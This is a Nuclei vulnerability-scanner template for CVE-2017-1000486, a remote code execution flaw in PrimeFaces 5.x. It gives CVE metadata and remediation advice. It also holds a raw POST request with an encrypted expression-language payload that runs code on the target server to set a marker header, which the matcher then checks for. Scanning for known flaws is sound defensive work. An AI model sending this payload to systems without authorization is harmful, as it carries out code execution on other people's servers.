nuclei-templates/http/cves/2017/CVE-2017-1000486.yaml

48 lines
1.7 KiB
YAML

id: CVE-2017-1000486
info:
name: Primetek Primefaces 5.x - Remote Code Execution
author: Moritz Nentwig
severity: critical
description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.
remediation: |
Apply the latest security patches or upgrade to a newer version of the Primetek Primefaces application.
reference:
- https://github.com/mogwailabs/CVE-2017-1000486
- https://github.com/pimps/CVE-2017-1000486
- https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
- https://cryptosense.com/weak-encryption-flaw-in-primefaces/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-1000486
cwe-id: CWE-326
epss-score: 0.96894
epss-percentile: 0.99606
cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: primetek
product: primefaces
tags: cve,cve2017,primetek,rce,injection,kev
http:
- raw:
- |
POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D
matchers:
- type: word
part: header
words:
- 'Mogwailabs: CHECKCHECK'
# digest: 490a0046304402206f803c97f382c3df05024cce44fd2be72585cf6c7d564a23a314fa68d806c7d9022007939c3e76a7e60bb1d794882fe1d6d09ab17fae421f3aa90e9a63b266d31cbc:922c64590222798bb761d5b6d8e72950